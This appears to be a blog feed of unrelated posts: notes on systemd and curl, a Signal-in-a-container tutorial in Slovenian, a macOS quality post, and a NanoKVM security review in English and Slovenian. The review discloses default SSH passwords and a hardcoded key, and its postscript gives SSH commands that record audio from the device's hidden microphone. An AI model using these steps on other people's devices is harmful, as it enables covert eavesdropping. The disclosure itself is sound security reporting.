
(The simplicity of OpenBSD's 'pledge' system is great, but it needs the program's active cooperation. For better or worse, Linux doesn't have a native, fully supported equivalent; instead we have to build it out of more fine grained, lower level facilities, and that's what systemd exposes.)

Learning how to do use the restrictions is probably worthwhile in general. We run plenty of things through locally written systemd .service units. Some amount of those things are potentially risky (although generally not too risky), and some of them could be more restricted than they are today if we wanted to do the work and knew what we were doing (and knew some of the gotchas involved).

(And sooner or later we're going to run into more things with restrictions already in their .service units, and we're going to want to change some aspects of how they work.)

I'm working to switch from wget to curl (due to Fedora)

By: cks

I've been using wget for a long time now, which means that I've developed a lot of habits, reflexes and even little scripts around it. Then wget2 happened, or more exactly Fedora switched from wget to wget2 (and Ubuntu is probably going to follow along). I'm very much not a fan of wget2 (also); I find it has both worse behavior and worse output than classical wget, in ways that routinely get in my way. Or got in my way before I started retraining myself to use curl instead of wget.

(It's actually possible that Ubuntu won't follow Fedora here. Ubuntu 24.04's 'wget' is classic wget, and Debian unstable currently has the wget package still as classic wget. The wget to wget2 transition involves the kind of changes that I can see Debian developers rejecting, so maybe Debian will keep 'wget' as classic wget. The upstream has a wget 1.25.0 release as recently as November 2024 (cf); on the other hand, the main project page says that 'currently GNU wget2 is being developed', so it certainly sounds like the upstream wants to move.)

One tool for my switch is wcurl (also, via), which is a cover script to provide a wget-like interface to curl. But I don't have wcurl everywhere (it's not packaged in Ubuntu 24.04, although I think it's coming in 26.04), so I've also been working to remember things like curl's -L and -O options (for downloading things, these are basically 'do what I want' options; I almost always want curl to follow HTTP redirects). There's a number of other options I want to remember, so since I've been looking at the curl manual page, here's some notes to myself.

(If I downloaded multiple URLs at once, I'll probably want to use '--remote-name-all' instead of repeating -O a lot. But I'm probably not going to remember that unless I write a script.)

My 'wcat' script is basically 'curl -L -sS <url>' (-s to not show the progress bar, -S to include at least the HTTP payload on an error, -L to follow redirects). My related 'wretr' script, which is intended to show headers too, is 'curl -L -sS -i <url>' (-i includes headers), or 'curl -sS -i <url>' if I want to explicitly see any HTTP redirect rather than automatically follow it.

(What I'd like is an option to show HTTP headers only if there was an HTTP error, but curl is currently all or nothing here.)

Some of the time I'll want to fetch files with the -J option, which is the curl equivalent of wget's --trust-server-names. This is necessary in cases where a project doesn't bother with good URLs for things. Possibly I also want to use '-R' to set the local downloaded file's timestamp based on the server provided timestamp, which is wget's traditional behavior (sometimes it's good, sometimes it's confusing).

PS: I care about wcurl being part of a standard Ubuntu package because then we can install it as part of one of our standard package sets. If it's a personal script, it's not pervasive, although that's still better than nothing.

PPS: I'm not going to blame Fedora for the switch from wget to wget2. Fedora has a consistent policy of marching forward in changes like this to stay in sync with what upstream is developing, even when they cause pain to people using Fedora. That's just what you sign up for when you choose Fedora (or drift into it, in my case; I've been using 'Fedora' since before it was Fedora).

How I discovered a hidden microphone on a Chinese NanoKVM

NanoKVM is a hardware KVM switch developed by the Chinese company Sipeed. Released last year, it enables remote control of a computer or server using a virtual keyboard, mouse, and monitor. Thanks to its compact size and low price, it quickly gained attention online, especially when the company promised to release its code as open-source. However, as we’ll see, the device has some serious security issues. But first, let’s start with the basics.

How Does the Device Work?

As mentioned, NanoKVM is a KVM switch designed for remotely controlling and managing computers or servers. It features an HDMI port, three USB-C ports, an Ethernet port for network connectivity, and a special serial interface. The package also includes a small accessory for managing the power of an external computer.

Using it is quite simple. First, you connect the device to the internet via an Ethernet cable. Once online, you can access it through a standard web browser (though JavaScript JIT must be enabled). The device supports Tailscale VPN, but with some effort (read: hacking), it can also be configured to work with your own VPN, such as WireGuard or OpenVPN server. Once set up, you can control it from anywhere in the world via your browser.

NanoKVM

NanoKVM

The device could be connected to the target computer using an HDMI cable, capturing the video output that would normally be displayed on a monitor. This allows you to view the computer’s screen directly in your browser, essentially acting as a virtual monitor.

Through the USB connection, NanoKVM can also emulate a keyboard, mouse, CD-ROM, USB drive, and even a USB network adapter. This means you can remotely control the computer as if you were physically sitting in front of it - but all through a web interface.

While it functions similarly to remote management tools like RDP or VNC, it has one key difference: there’s no need to install any software on the target computer. Simply plug in the device, and you’re ready to manage it remotely. NanoKVM even allows you to enter the BIOS, and with the additional accessory for power management, you can remotely turn the computer on, off, or reset it.

This makes it incredibly useful - you can power on a machine, access the BIOS, change settings, mount a virtual bootable CD, and install an operating system from scratch, just as if you were physically there. Even if the computer is on the other side of the world.

NanoKVM is also quite affordable. The fully-featured version, which includes all ports, a built-in mini screen, and a case, costs just over €60, while the stripped-down version is around €30. By comparison, a similar RaspberryPi-based device, PiKVM, costs around €400. However, PiKVM is significantly more powerful and reliable and, with a KVM splitter, can manage multiple devices simultaneously.

As mentioned earlier, the announcement of the device caused quite a stir online - not just because of its low price, but also due to its compact size and minimal power consumption. In fact, it can be powered directly from the target computer via a USB cable, which it also uses to simulate a keyboard, mouse, and other USB devices. So you have only one USB cable - in one direction it powers NanoKVM, on the other it helps it to simulate keyboard mouse and other devices on a computer you want to manage.

The device is built on the open-source RISC-V processor architecture, and the manufacturer eventually did release the device’s software under an open-source license at the end of last year. (To be fair, one part of the code remains closed, but the community has already found a suitable open-source replacement, and the manufacturer has promised to open this portion soon.)

However, the real issue is security.

Understandably, the company was eager to release the device as soon as possible. In fact, an early version had a minor hardware design flaw - due to an incorrect circuit cable, the device sometimes failed to detect incoming HDMI signals. As a result, the company recalled and replaced all affected units free of charge. Software development also progressed rapidly, but in such cases, the primary focus is typically on getting basic functionality working, with security taking a backseat.

So, it’s not surprising that the developers made some serious missteps - rushed development often leads to stupid mistakes. But some of the security flaws I discovered in my quick (and by no means exhaustive) review are genuinely concerning.

One of the first security analysis revealed numerous vulnerabilities - and some rather bizarre discoveries. For instance, a security researcher even found an image of a cat embedded in the firmware. While the Sipeed developers acknowledged these issues and relatively quickly fixed at least some of them, many remain unresolved.

NanoKVM

NanoKVM

After purchasing the device myself, I ran a quick security audit and found several alarming flaws. The device initially came with a default password, and SSH access was enabled using this preset password. I reported this to the manufacturer, and to their credit, they fixed it relatively quickly. However, many other issues persist.

The user interface is riddled with security flaws - there’s no CSRF protection, no way to invalidate sessions, and more. Worse yet, the encryption key used for password protection (when logging in via a browser) is hardcoded and identical across all devices. This is a major security oversight, as it allows an attacker to easily decrypt passwords. More problematic, this needed to be explained to the developers. Multiple times.

Another concern is the device’s reliance on Chinese DNS servers. And configuring your own (custom) DNS settings is quite complicated. Additionally, the device communicates with Sipeed’s servers in China - downloading not only updates but also the closed-source component mentioned earlier. For this closed source component it needs to verify an identification key, which is stored on the device in plain text. Alarmingly, the device does not verify the integrity of software updates, includes a strange version of the WireGuard VPN application (which does not work on some networks), and runs a heavily stripped-down version of Linux that lacks systemd and apt. And these are just a few of the issues.

Were these problems simply oversights? Possibly. But what additionally raised red flags was the presence of tcpdump and aircrack - tools commonly used for network packet analysis and wireless security testing. While these are useful for debugging and development, they are also hacking tools that can be dangerously exploited. I can understand why developers might use them during testing, but they have absolutely no place on a production version of the device.

A Hidden Microphone

And then I discovered something even more alarming - a tiny built-in microphone that isn’t clearly mentioned in the official documentation. It’s a miniature SMD component, measuring just 2 x 1 mm, yet capable of recording surprisingly high-quality audio.

What’s even more concerning is that all the necessary recording tools are already installed on the device! By simply connecting via SSH (remember, the device initially used default passwords!), I was able to start recording audio using the amixer and arecord tools. Once recorded, the audio file could be easily copied to another computer. With a little extra effort, it would even be possible to stream the audio over a network, allowing an attacker to eavesdrop in real time.

Hidden Microphone in NanoKVM

Hidden Microphone in NanoKVM

Physically removing the microphone is possible, but it’s not exactly straightforward. As seen in the image, disassembling the device is tricky, and due to the microphone’s tiny size, you’d need a microscope or magnifying glass to properly desolder it.

To summarize: the device is riddled with security flaws, originally shipped with default passwords, communicates with servers in China, comes preinstalled with hacking tools, and even includes a built-in microphone - fully equipped for recording audio - without clear mention of it in the documentation. Could it get any worse?

I am pretty sure these issues stem from extreme negligence and rushed development rather than malicious intent. However, that doesn’t make them any less concerning.

That said, these findings don’t mean the device is entirely unusable.

Since the device is open-source, it’s entirely possible to install custom software on it. In fact, one user has already begun porting his own Linux distribution - starting with Debian and later switching to Ubuntu. With a bit of luck, this work could soon lead to official Ubuntu Linux support for the device.

This custom Linux version already runs the manufacturer’s modified KVM code, and within a few months, we’ll likely have a fully independent and significantly more secure software alternative. The only minor inconvenience is that installing it requires physically opening the device, removing the built-in SD card, and flashing the new software onto it. However, in reality, this process isn’t too complicated.

And while you’re at it, you might also want to remove the microphone… or, if you prefer, connect a speaker. In my test, I used an 8-ohm, 0.5W speaker, which produced surprisingly good sound - essentially turning the NanoKVM into a tiny music player. Actually, the idea is not so bad, because PiKVM also included 2-way audio support for their devices end of last year.

Basic board with speaker

Basic board with speaker

Final Thoughts

All this of course raises an interesting question: How many similar devices with hidden functionalities might be lurking in your home, just waiting to be discovered? And not just those of Chinese origin. Are you absolutely sure none of them have built-in miniature microphones or cameras?

You can start with your iPhone - last year Apple has agreed to pay $95 million to settle a lawsuit alleging that its voice assistant Siri recorded private conversations. They shared the data with third parties and used them for targeted ads. “Unintentionally”, of course! Yes, that Apple, that cares about your privacy so much.

And Google is doing the same. They are facing a similar lawsuit over their voice assistant, but the litigation likely won’t be settled until this fall. So no, small Chinese startup companies are not the only problem. And if you are worried about Chinese companies obligations towards Chinese government, let’s not forget that U.S. companies also have obligations to cooperate with U.S. government. While Apple is publicly claiming they do not cooperate with FBI and other U. S. agencies (because thy care about your privacy so much), some media revealed that Apple was holding a series secretive Global Police Summit at its Cupertino headquarters where they taught police how to use their products for surveillance and policing work. And as one of the police officers pointed out - he has “never been part of an engagement that was so collaborative.”. Yep.

P.S. How to Record Audio on NanoKVM

If you want to test the built-in microphone yourself, simply connect to the device via SSH and run the following two commands:

  • amixer -Dhw:0 cset name='ADC Capture Volume 20' (this sets microphone sensitivity to high)
  • arecord -Dhw:0,0 -d 3 -r 48000 -f S16_LE -t wav test.wav & > /dev/null & (this will capture the sound to a file named test.wav)

Now, speak or sing (perhaps the Chinese national anthem?) near the device, then press Ctrl + C, copy the test.wav file to your computer, and listen to the recording.

Kako sem na mini kitajski napravi odkril skriti mikrofon

Lansko leto je kitajsko podjetje Sipeed izdalo zanimivo napravico za oddaljeno upravljanje računalnikov in strežnikov, ki sliši na ime NanoKVM. Gre za tim. KVM stikalo (angl. KVM switch), torej fizično napravo, ki omogoča oddaljeno upravljanje računalnika oz. strežnika preko virtualne tipkovnice, miške in monitorja.

Kako deluje?

Napravica ima en HDMI, tri USB-C priključke, Ethernet priključek za omrežni kabel in posebno “letvico”, kamor priključimo dodaten priložen vmesnik za upravljanje napajanja zunanjega računalnika. Kako zadeva deluje? Zelo preprosto. Napravico preko omrežnega Ethernet kabla povežemo na internet in se potem lahko nanjo s pomočjo navadnega spletnega brskalnika povežemo od koderkoli (je pa v brskalniku potrebno omogočiti JavaScript JIT). Vgrajena je sicer že tudi podpora za Tailscale VPN, a z malo truda oz. hekanja jo lahko povežemo tudi na svoj VPN (Wireguard ali OpenVPN). Torej lahko do nje preprosto dostopamo preko interneta od kjerkoli na svetu.

NanoKVM

NanoKVM

Napravico nato na računalnik, ki ga želimo upravljati povežemo preko HDMI kabla, naprava pa nato zajema sliko (ki bi se sicer prikazovala na monitorju) in to sliko lahko potem vidimo v brskalniku. Povezava preko USB na ciljnem računalniku simulira tipkovnico, miško, CD-ROM/USB ključek ter celo USB omrežno kartico. S tem naprava omogoča oddaljeno upravljanje računalnika kot bi sedeli za njim, v resnici pa računalnik upravljamo kar preko brskalnika preko interneta. Za razliko od aplikacij za oddaljeno upravljanje računalnika tukaj na ciljni računalnik ni potrebno nameščati ničesar, dovolj je, da nanj priključimo to napravico. Seveda pa s pomočjo te naprave lahko vstopimo tudi v BIOS ciljnega računalnika, z dodatnim vmesnikom, ki ga priključimo na prej omenjeno “letvico” pa oddaljeni računalnik lahko tudi ugasnemo, prižgemo ali resetiramo.

Uporabno, saj na ta način lahko računalnik prižgemo, gremo v BIOS in tam spreminjamo nastavitve, nato pa vanj virtualno vstavimo zagonski CD in celo namestimo operacijski sistem. Pa čeprav se računalnik nahaja na drugem koncu sveta.

Napravica je precej poceni - razširjena različica, ki ima vse priključke, vgrajen mini zaslonček in prikupno ohišje stane nekaj čez 60 EUR, oskubljena različica pa okrog 30 EUR. Za primerjavo, podobna naprava ki temelji na RaspberryPi in se imenuje PiKVM, stane okrog 400 EUR, je pa res, da je tista naprava precej bolj zmogljiva in zanesljiva, preko KVM razdelillca pa omogoča tudi upravljanje več naprav hkrati.

Kaj pa varnost?

Najava naprave je na spletu povzročila precej navdušenja, ne samo zaradi nizke cene, pač pa tudi zato, ker je res majhna in porabi minimalno energije (napaja se lahko kar iz ciljnega računalnika preko USB kabla s katerim v drugo smer simulira tipkovnico, miško in ostale USB naprave). Zgrajena je na odprtokodni RISC-V procesorski arhitekturi, proizvajalec pa je obljubil, da bo programsko kodo naprave odprl oziroma jo izdal pod odprtokodno licenco, kar se je konec lanskega leta tudi res zgodilo. No, en del sicer še ni povsem odprt, a je skupnost že našla ustrezno odprtokodno nadomestilo, pa tudi proizvajalec je obljubil, da bodo odprli tudi ta del kode.

Težava pa je varnost.

Proizvajalec je seveda imel interes napravico čim prej dati na trg in ena izmed prvih različic je celo imela manjšo napako v strojni zasnovi (zaradi uporabe napačnega kabla na vezju naprava včasih ni zaznala vhodnega HDMI signala) zato so vse napravice odpoklicali in jih brezplačno zamenjali. Tudi razvoj programske opreme je bil precej intenziven in jasno je, da je podjetju v takem primeru v fokusu predvsem razvoj osnovne funkcionalnosti, varnost pa je na drugem mestu.

Zato ne preseneča, da so bili razvijalci pri razvoju precej malomarni, kar je seveda posledica hitenja. A nekatere ugotovitve mojega hitrega (in vsekakor ne celovitega) varnostnega pregleda so resnično zaskrbljujoče.

Že eden prvih hitrih varnostnih pregledov je odkril številne pomanjkljivosti in celo prav bizarne zadeve - med drugim je varnostni raziskovalec na strojni programski opremi naprave našel celo sliko mačke. Razvijalci podjetja Sipeed so te napake priznali in jih - vsaj nekatere - tudi relativno hitro odpravili. A še zdaleč ne vseh.

Odprt NanoKVM

Odprt NanoKVM

Napravico sem pred kratkim kupil tudi sam in tudi moj hitri pregled je odkril številne pomanjkljivosti. Naprava je na začetku imela nastavljeno privzeto geslo, z enakim geslom so bile omogočene tudi ssh povezave na napravo. Proizvajalca sem o tem obvestil in so zadevo relativno hitro popravili. A številne napake so ostale.

Tako ima uporabniški vmesnik še vedno cel kup pomanjkljivosti - ni CSFR zaščite, ni mogoče invalidirati seje, in tako dalje. Šifrirni ključ za zaščito gesel (ko se preko brskalnika prijavimo na napravo) je kar vgrajen (angl. hardcoded) in za vse naprave enak. Kar absolutno nima smisla, saj napadalec s pomočjo tega ključa geslo lahko povsem preprosto dešifrira. Težava je, da je bilo to potrebno razvijalcem posebej razložiti. In to večkrat.

Osebno me je zmotilo, da naprava uporablja neke kitajske DNS strežnike - nastavitev lastnih DNS strežnikov pa je precej zapletena. Prav tako naprava prenaša podatke iz kitajskih strežnikov podjetja (v bistvu iz teh strežnikov prenaša zaenkrat še edino zaprtokodno komponento, pri čemer pa preverja identifikacijski ključ naprave, ki je sicer na napravi shranjen v nešifrirani obliki). Naprava ne preverja integritete posodobitev, ima nameščeno neko čudno različico Wireguard VPN aplikacije, na njej teče precej oskubljena različica Linuxa brez systemd in apt komponente, najde pa se še precej podobnih cvetk. Porodne težave?

Morda. A na napravi sta nameščeni orodji tcpdump in aircrack, ki se sicer uporabljata za razhroščevanje in pomoč pri razvoju, vseeno pa gre za hekerski orodji, ki ju je mogoče nevarno zlorabiti. Sicer povsem razumem zakaj razvijalci ti dve orodji uporabljajo, a v produkcijski različici naprave resnično nimata kaj iskati.

Skriti mikrofon

Potem pa sem na napravici odkril še mini mikrofon, ki ga dokumentacija ne omenja jasno. Gre za miniaturno SMD komponento, velikosti 2 x 1 mm, ki pa dejansko omogoča snemanje precej kakovostnega zvoka. In kar je dodatno zaskrbljujoče je to, da so na napravi že nameščena vsa orodja za snemanje! To omogoča, da se na napravico povežemo preko ssh (saj se spomnite, da sem na začetku omenil, da je naprava uporabljala privzeta gesla!), nato pa s pomočjo orodij amixer in arecord preprosto zaženemo snemanje zvoka. Datoteko s posnetkom nato preprosto skopiramo na svoj računalnik. Z malo truda pa bi bilo seveda mogoče implementirati tudi oddajanje zvoka preko omrežja, kar bi napadalcu seveda omogočalo prisluškovanje v realnem času.

Skriti mikrofon v NanoKVM

Skriti mikrofon v NanoKVM

Mikrofon bi bilo sicer mogoče odstraniti, a je za to napravico potrebno fizično razdreti in mikrofon nato odlotati iz nje. Kot je razvidno iz slike to ni povsem enostavno, poleg tega si je treba pri lotanju pomagati z mikroskopom oz. povečevalnim steklom.

Skratka, če povzamemo. Naprava ima kup varnostnih pomanjkljivosti, vsaj na začetku je uporabljala privzeta gesla, komunicira s strežniki na Kitajskem, ima nameščena hekerska orodja in vgrajen mikrofon z vso programsko podporo za snemanje zvoka, ki ga pa dokumentacija ne omenja jasno! Je lahko še slabše?

Sicer sem prepričan, da je to posledica predvsem skrajne malomarnosti in hitenja pri razvoju in ne zlonamernosti, a vseeno vse skupaj pušča precej slab priokus.

Po drugi strani pa te ugotovitve nikakor ne pomenijo, da naprava ni uporabna.

Ker je zasnova naprave odprta je seveda nanjo mogoče namestiti svojo programsko opremo. Eden izmed uporabnikov je tako začel na napravo prenašati svojo različico Linuxa (najprej Debian, zdaj je preklopil na Ubuntu), in z malo sreče bo ta koda kmalu postala osnova za to, da bo Ubuntu Linux tudi uradno podprt na teh napravah. Na tej različici Linuxa že teče modificirana KVM koda proizvajalca in verjetno bomo v nekaj mesecih že dobili popolnoma neodvisno programsko opremo, ki bo tudi bistveno bolj varna. Manjša težava je, da bo za namestitev te programske opreme napravo treba fizično odpreti, ven vzeti vgrajeno SD kartico in nanjo zapisati to alternativno programsko kodo. A v resnici to ni preveč zapleteno. Lahko pa ob tem še odlotamo mikrofon… ali pa gor priključimo zvočnik. Sam sem za test uporabil 8 Ohmski, 0.5 W zvočnik, ki zmore predvajati kar kvaliteten zvok in tako dobil mini predvajalnik glasbe. :)

Osnovna plošča z zvočnikom

Osnovna plošča z zvočnikom

Za konec pa se je dobro vprašati koliko podobnih napravic s skritimi funkcionalnostmi bi se s podobnim pregledom še našlo v vaših domovih? In to ne nujno samo kitajskega izvora. Ste prepričani, da nobena od njih nima vgrajenih miniaturnih mikrofonov ali kamer?

P. S. Za snemanje se je treba na napravico povezati preko ssh in zagnati naslednja dva ukaza:

  • amixer -Dhw:0 cset name='ADC Capture Volume 20' (s tem nastavimo visoko občutljivost mikrofona)
  • arecord -Dhw:0,0 -d 3 -r 48000 -f S16_LE -t wav test.wav & > /dev/null &

Zdaj lahko poleg napravice govorite ali prepevate (na primer kitajsko himno), nato pa pritisnete ctrl-c in datoteko test.wav skopirate na svoj računalnik kjer jo lahko poslušate.

Signal kontejner

Signal je aplikacija za varno in zasebno sporočanje, ki je brezplačna, odprtokodna in enostavna za uporabo. Uporablja močno šifriranje od začetne do končne točke (anlg. end-to-end), uporabljajo pa jo številni aktivisti, novinarji, žvižgači, pa tudi državni uradniki in poslovneži. Skratka vsi, ki cenijo svojo zasebnost. Signal teče na mobilnih telefonih z operacijskim sistemom Android in iOS, pa tudi na namiznih računalnikih (Linux, Windows, MacOS) - pri čemer je namizna različica narejena tako, da jo povežemo s svojo mobilno različico Signala. To nam omogoča, da lahko vse funkcije Signala uporabljamo tako na telefonu kot na namiznem računalniku, prav tako se vsa sporočila, kontakti, itd. sinhronizirajo med obema napravama. Vse lepo in prav, a Signal je (žal) vezan na telefonsko številko in praviloma lahko na enem telefonu poganjate samo eno kopijo Signala, enako pa velja tudi za namizni računalnik. Bi se dalo to omejitev zaobiti? Vsekakor, a za to je potreben manjši “hack”. Kakšen, preberite v nadaljevanju.

Poganjanje več različic Signala na telefonu

Poganjanje več različic Signala na telefonu je zelo enostavno - a samo, če uporabljate GrapheneOS. GrapheneOS je operacijski sistem za mobilne telefone, ki ima vgrajene številne varnostne mehanizme, poleg tega pa je zasnovan na način, da kar najbolje skrbi za zasebnost uporabnika. Je odprtokoden, visoko kompatibilen z Androidom, vendar s številnimi izboljšavami, ki izredno otežujejo oz. kar onemogočajo tako forenzični zaseg podatkov, kot tudi napade z vohunsko programsko opremo tipa Pegasus in Predator.

GrapheneOS omogoča uporabo več profilov (do 31 + uporabniški profil tim. gosta), ki so med seboj popolnoma ločeni. To pomeni, da lahko v različnih profilih nameščate različne aplikacije, imate povsem različen seznam stikov, na enem profilu uporabljate en VPN, na drugem drugega ali pa sploh nobenega, itd.

Rešitev je torej preprosta. V mobilnem telefonu z GrapheneOS si odpremo nov profil, tam namestimo novo kopijo Signala, v telefon vstavimo drugo SIM kartico in Signal povežemo z novo številko.

Ko je telefonska številka registrirana, lahko SIM kartico odstranimo in v telefon vstavimo staro. Signal namreč za komunikacijo uporablja samo prenos podatkov (seveda lahko telefon uporabljamo tudi brez SIM kartice, samo na WiFi-ju). Na telefonu imamo sedaj nameščeni dve različici Signala, vezani na dve različni telefonski številki, in iz obeh različic lahko pošiljamo sporočila (tudi med njima dvema!) ali kličemo.

Čeprav so profili ločeni, pa lahko nastavimo, da obvestila iz aplikacije Signal na drugem profilu, dobivamo tudi ko smo prijavljeni v prvi profil. Le za pisanje sporočil ali vzpostavljanje klicev, bo treba preklopiti v pravi profil na telefonu.

Preprosto, kajne?

Poganjanje več različic Signala na računalniku

Zdaj bi si seveda nekaj podobnega želeli tudi na računalniku. Skratka, želeli bi si možnosti, da na računalniku, pod enim uporabnikom poganjamo dve različni instanci Signala (vsaka vezana na svojo telefonsko številko).

No, tukaj je zadeva na prvi pogled malenkost bolj zapletena, a se s pomočjo virtualizacije da težavo elegantno rešiti. Seveda na računalniku samo za Signal ne bomo poganjali kar celega novega virtualnega stroja, lahko pa uporabimo tim. kontejner.

V operacijskem sistemu Linux najprej namestimo aplikacijo systemd-container (v sistemih Ubuntu je sicer že privzeto nameščena).

Na gostiteljskem računalniku omogočimo tim neprivilegirane uporabniške imenske prostore (angl. unprivileged user namespaces), in sicer z ukazom sudo nano /etc/sysctl.d/nspawn.conf, nato pa v datoteko vpišemo:

kernel.unprivileged_userns_clone=1

Zdaj je SistemD storitev treba ponovno zagnati:

sudo systemctl daemon-reload
sudo systemctl restart systemd-sysctl.service
sudo systemctl status systemd-sysctl.service

…nato pa lahko namestimo Debootstrap: sudo apt install debootstrap.

Zdaj ustvarimo nov kontejner, v katerega bomo namestili operacijski sistem Debian (in sicer različico stable) - v resnici bo nameščena le minimalno zahtevana koda operacijskega sistema:

sudo debootstrap --include=systemd,dbus stable

Dobimo približno takle izpis:

/var/lib/machines/debian
I: Keyring file not available at /usr/share/keyrings/debian-archive-keyring.gpg; switching to https mirror https://deb.debian.org/debian
I: Retrieving InRelease 
I: Retrieving Packages 
I: Validating Packages 
I: Resolving dependencies of required packages...
I: Resolving dependencies of base packages...
I: Checking component main on https://deb.debian.org/debian...
I: Retrieving adduser 3.134
I: Validating adduser 3.134
...
...
...
I: Configuring tasksel-data...
I: Configuring libc-bin...
I: Configuring ca-certificates...
I: Base system installed successfully.

Zdaj je kontejner z operacijskim sistemom Debian nameščen. Zato ga zaženemo in nastavimo geslo korenskega uporabnika :

sudo systemd-nspawn -D /var/lib/machines/debian -U --machine debian

Dobimo izpis:

Spawning container debian on /var/lib/machines/debian.
Press Ctrl-] three times within 1s to kill container.
Selected user namespace base 1766326272 and range 65536.
root@debian:~#

Zdaj se preko navideznega terminala povežemo v operacijski sistem in vpišemo naslednja dva ukaza:

passwd
printf 'pts/0\npts/1\n' >> /etc/securetty 

S prvim ukazom nastavimo geslo, drugi pa omogoči povezavo preko tim. lokalnega terminala (TTY). Na koncu vpišemo ukaz logout in se odjavimo nazaj na gostiteljski računalnik.

Zdaj je treba nastaviti omrežje, ki ga bo uporabljal kontejner. Najbolj enostavno je, če uporabimo kar omrežje gostiteljskega računalnika. Vpišemo naslednja dva ukaza:

sudo mkdir /etc/systemd/nspawn
sudo nano /etc/systemd/nspawn/debian.nspawn

V datoteko vnesemo:

[Network]
VirtualEthernet=no

Zdaj kontejner ponovno zaženemo z ukazom sudo systemctl start systemd-nspawn@debian ali pa še enostavneje - machinectl start debian.

Seznam zagnanih kontejnerjev si lahko tudi ogledamo:

machinectl list
MACHINE CLASS     SERVICE        OS     VERSION ADDRESSES
debian  container systemd-nspawn debian 12      -        

1 machines listed.

Oziroma se povežemo v ta virtualni kontejner: machinectl login debian. Dobimo izpis:

Connected to machine debian. Press ^] three times within 1s to exit session.

Debian GNU/Linux 12 cryptopia pts/1

cryptopia login: root
Password: 

Na izpisu se vidi, da smo se povezali z uporabnikom root in geslom, ki smo ga prej nastavili.

Zdaj v tem kontejnerju namestimo Signal Desktop.

apt update
apt install wget gpg

wget -O- https://updates.signal.org/desktop/apt/keys.asc | gpg --dearmor > signal-desktop-keyring.gpg

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/signal-desktop-keyring.gpg] https://updates.signal.org/desktop/apt xenial main' | tee /etc/apt/sources.list.d/signal-xenial.list

apt update
apt install --no-install-recommends signal-desktop
halt

Z zadnjim ukazom kontejner zaustavimo. Zdaj je v njem nameščena sveža različica aplikacije Signal Desktop.

Mimogrede, če želimo, lahko kontejner preimenujemo v bolj prijazno ime, npr. sudo machinectl rename debian debian-signal. Seveda pa bomo potem isto ime morali uporabljati tudi za zagon kontejnerja (torej, machinectl login debian-signal).

Zdaj naredimo skripto, s katero bomo kontejner pognali in v njem zagnali Signal Desktop na način, da bomo njegovo okno videli na namizju gostiteljskega računalnika:

Ustvarimo datoteko nano /opt/runContainerSignal.sh (ki jo shranimo npr. v mapo /opt), vsebina datoteke pa je naslednja:

#!/bin/sh
xhost +local:
pkexec systemd-nspawn --setenv=DISPLAY=:0 \
                      --bind-ro=/tmp/.X11-unix/  \
                      --private-users=pick \
                      --private-users-chown \
                      -D /var/lib/machines/debian-signal/ \
                      --as-pid2 signal-desktop --no-sandbox
xhost -local:

S prvim xhost ukazom omogočimo povezovanje na naš zaslon, vendar samo iz lokalnega računalnika, drugi xhost ukaz pa bo te povezave (na zaslon) spet blokiral). Nastavimo, da je skripta izvršljiva (chmod +x runContainerSignal.sh), in to je to.

Dve ikoni aplikacije Signal Desktop

Dve ikoni aplikacije Signal Desktop

No, ne še čisto, saj bi skripto morali zaganjati v terminalu, veliko bolj udoben pa je zagon s klikom na ikono.

Naredimo torej .desktop datoteko: nano ~/.local/share/applications/runContainerSignal.desktop. Vanjo zapišemo naslednjo vsebino:

[Desktop Entry]
Type=Application
Name=Signal Container
Exec=/opt/runContainerSignal.sh
Icon=security-high
Terminal=false
Comment=Run Signal Container

…namesto ikone security-high, lahko uporabimo kakšno drugo, na primer:

Icon=/usr/share/icons/Yaru/scalable/status/security-high-symbolic.svg

Pojasnilo: skripta je shranjena v ~/.local/share/applications/, torej je dostopa samo specifičnemu uporabniku in ne vsem uporabnikom na računalniku.

Zdaj nastavimo, da je .desktop datoteka izvršljiva: chmod +x ~/.local/share/applications/runContainerSignal.desktop

Osvežimo tim. namizne vnose (angl. Desktop Entries): update-desktop-database ~/.local/share/applications/, in to je to!

Dve instanci aplikacije Signal Desktop

Dve instanci aplikacije Signal Desktop

Ko bomo v iskalnik aplikacij vpisali “Signal Container”, se bo prikazala ikona aplikacije, sklikom na njo pa bomo zagnali Signal v kontejnerju (bo pa za zagon potrebno vpisati geslo).

Zdaj ta Signal Desktop samo še povežemo s kopijo Signala na telefonu in že lahko na računalniku uporabljamo dve kopiji aplikacije Signal Desktop.

Kaj pa…?

Žal pa v opisanem primeru ne deluje dostop do kamere in zvoka. Klice bomo torej še vedno morali opravljati iz telefona.

Izkaže se namreč, da je povezava kontejnerja z zvočnim sistemom PipeWire in kamero gostiteljskega računalnika neverjetno zapletena (vsaj v moji postavitvi sistema). Če imate namig kako zadevo rešiti, pa mi seveda lahko sporočite. :)

The Myth and Reality of Mac OS X Snow Leopard

By: Nick Heer

Jeff Johnson in November 2023:

When people wistfully proclaim that they wish for the next major macOS version to be a “Snow Leopard update”, they’re wishing for the wrong thing. No major update will solve Apple’s quality issues. Major updates are the cause of quality issues. The solution would be a long string of minor bug fix updates. What people should be wishing for are the two years of stability and bug fixes that occurred after the release of Snow Leopard. But I fear we’ll never see that again with Tim Cook in charge.

I read an article today from yet another person pining for a mythical Snow Leopard-style MacOS release. While I sympathize with the intent of their argument, it is largely fictional and, as Johnson writes, it took until about two years into Snow Leopard’s release cycle for it to be the release we want to remember:

It’s an iron law of software development that major updates always introduce more bugs than they fix. Mac OS X 10.6.0 was no exception, of course. The next major update, Mac OS X 10.7.0, was no exception either, and it was much buggier than 10.6.8 v1.1, even though both versions were released in the same week.

What I desperately miss is that period of stability after a few rounds of bug fixes. As I have previously complained about, my iMac cannot run any version of MacOS newer than Ventura, released in 2022. It is still getting bug and security fixes. In theory, this should mean I am running a solid operating system despite missing some features.

It is not. Apple’s engineering efforts quickly moved toward shipping MacOS Sonoma in 2023, and then Sequoia last year. It seems as though any bug fixes were folded into these new major versions and, even worse, new bugs were introduced late in the Ventura release cycle that have no hope of being fixed. My iMac seizes up when I try to view HDR media; because this Extended Dynamic Range is an undocumented enhancement, there is no preference to turn it off. Recent Safari releases have contained several bugs related to page rendering and scrolling. Weather sometimes does not display for my current location.

Ventura was by no means bug-free when it shipped, and I am disappointed even its final form remains a mess. My MacBook Pro is running the latest public release of MacOS Sequoia and it, too, has new problems late in its development cycle; I reported a Safari page crashing bug earlier this week. These are on top of existing problems, like how there is no way to change the size of search results’ thumbnails in Photos.

